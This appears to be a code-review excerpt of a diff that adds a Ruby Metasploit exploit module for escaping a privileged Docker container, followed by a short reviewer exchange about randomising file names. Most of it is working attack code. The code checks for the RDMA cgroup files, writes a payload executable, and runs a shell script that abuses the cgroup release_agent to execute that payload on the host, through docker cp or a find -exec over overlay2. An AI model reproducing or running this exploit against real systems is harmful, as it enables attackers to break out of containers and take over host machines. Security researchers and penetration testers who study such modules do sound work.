modules/exploits/linux/local/docker_privileged_container_escape.rb

```diff
@@ -0,0 +1,153 @@
+      return CheckCode::Safe('Not inside a Docker container')
+    end
+
+    # is root user
+    unless is_root?
+      return Exploit::CheckCode::Safe('Exploit requires root inside container')
+    end
+
+    # are rdma files present in /sys/
+    path = cmd_exec('ls -x /s*/fs/c*/*/r* | head -n1')
+    unless path.start_with? '/'
+      return Exploit::CheckCode::Safe('Required /sys/ files for exploitation not found, possibly old version of docker or not a privileged container.')
+    end
+
+    CheckCode::Appears('Inside Docker container and target appears vulnerable')
+  end
+
+  def exploit
+    unless writable? base_dir_container
+      fail_with Failure::BadConfig, "#{base_dir_container} is not writable"
+    end
+
+    pl = generate_payload_exe
+    exe_path = "#{base_dir_container}/#{rand_text_alpha(6..11)}"
+    print_status("Writing payload executable to '#{exe_path}'")
+
+    write_file(exe_path, pl)
+    register_file_for_cleanup(exe_path)
+
+    print_status('Executing script to exploit privileged container')
+    vprint_status(cmd_exec("chmod +x #{exe_path}"))
+
+    script = shell_script(exe_path)
+
+    vprint_status("Script: #{script}")
+    print_status(cmd_exec(script))
+
+    print_status "Waiting #{datastore['WfsDelay']}s for payload"
+  end
+
+  def shell_script(payload_path)
+    # The tricky bit is finding the payload on the host machine in order to execute it. The options here are
+    # 1. Find the file on the host operating system `find /var/lib/docker/overlay2/ -name 'JGsgvlU' -exec {} \;`
+    # 2. Copy the payload out of the container and execute it `docker cp containerid:/tmp/JGsgvlU /tmp/JGsgvlU && /tmp/JGsgvlU`
+
+    id = container_id
+    filename = File.basename(payload_path)
+
+    vprint_status("container id #{id}")
+
+    # If we cant find the id, or user requested it, search for the payload on the filesystem rather than copying it out of container
+    if id.nil? || datastore['ForcePayloadSearch']
+      # We couldn't find a container name, lets try and find the payload on the filesystem and then execute it
+      print_status('Searching for payload on host')
+      command = "find /var/lib/docker/overlay2/ -name '#{filename}' -exec {} \\;"
+    else
+      # We found a container id, copy the payload to host, then execute it
+      payload_path_host = "#{base_dir_host}/#{filename}"
+      print_status("Found container id #{container_id}, copying payload to host")
+      command = "docker cp #{id}:#{payload_path} #{payload_path_host}; #{payload_path_host}"
+    end
+
+    vprint_status(command)
+
+    %{
+      d=$(dirname "$(ls -x /s*/fs/c*/*/r* | head -n1)")
+      mkdir -p "$d/w"
+      echo 1 >"$d/w/notify_on_release"
+      t="$(sed -n 's/.*\\perdir=\\([^,]*\\).*/\\1/p' /etc/mtab)"
+      touch /o
+      echo "$t/c" >"$d/release_agent"
+      printf "#!/bin/sh\\n%s > %s/o" "#{command}" "$t">/c
+      chmod +x /c
+      sh -c "echo 0 >$d/w/cgroup.procs"
+      sleep 1
+      cat /o
+      rm /c /o
```

Comment:
Would it be possible to randomize some of these file names like we do the for the base executable?

Reply:
yup, I'll get on that!